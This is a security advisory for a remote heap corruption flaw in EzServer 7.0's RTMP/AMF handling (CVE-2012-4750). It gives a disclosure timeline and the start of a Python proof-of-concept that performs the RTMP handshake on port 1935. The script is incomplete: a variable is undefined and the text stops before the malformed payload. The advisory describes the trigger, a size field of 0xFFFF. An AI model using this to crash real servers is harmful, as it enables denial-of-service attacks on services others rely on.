[Description]:
EzServer is a software for audio and video streaming adopted by various companies worldwide. Version 7.0 is affected by a remote heap corruption vulnerability. Version 6.x is not affected by this issue, as does not implement RTMP support.
[Impact]:
A remote unauthenticated attacker can DoS the application. Remote Command Execution could be possible, however an exploit has yet to be developed.
[Details]:
The vulnerability is caused by the following lines of code:
The application pass to memcpy() an uncontrolled size, which is directly taken from the AMF request in the RTMP packet.After have successfully completed the RTMP handshake, an attacker can send a malformed AMF request embedded in the RTMP session, with an high value for the 'size' field (2 bytes, such as 0xFFFF) and a lower-sized 'string' (such as 'connect'). This result in a heap corruption and a crash for the application.
[Fix]:
Support for the RTMP protocol appears disabled (but not fully removed) in version 7.1. However there is no official response from the vendor (see disclosure).
[Proof of Concept code]:
http://pastebin.com/k05djr6C
[Disclosure]:
09/09/2012: Vendor contacted.
07/10/2012: No response. Sent another mail.
13/10/2012: Still no response. Disclosure.
#Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
#Author: Lorenzo Cantoni
#CVE: CVE-2012-4750
#Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
from socket import *
import sys
import os
import time
if len(sys.argv) >=2:
server = sys.argv[1]
else:
server ="192.168.1.65"
s = socket(AF_INET, SOCK_STREAM)
s.connect((server,1935))
# Handshake C0+C1 (sent by client)
s.send(c0c1)
time.sleep(2)
# Handshake S0+S1+S2 (sent by server)
s0s1s2= s.recv(1700)
time.sleep(2)
# Handshake C2
#parse the payload which has to be echoed back to the server
echo = s0s1s2[1:1537]
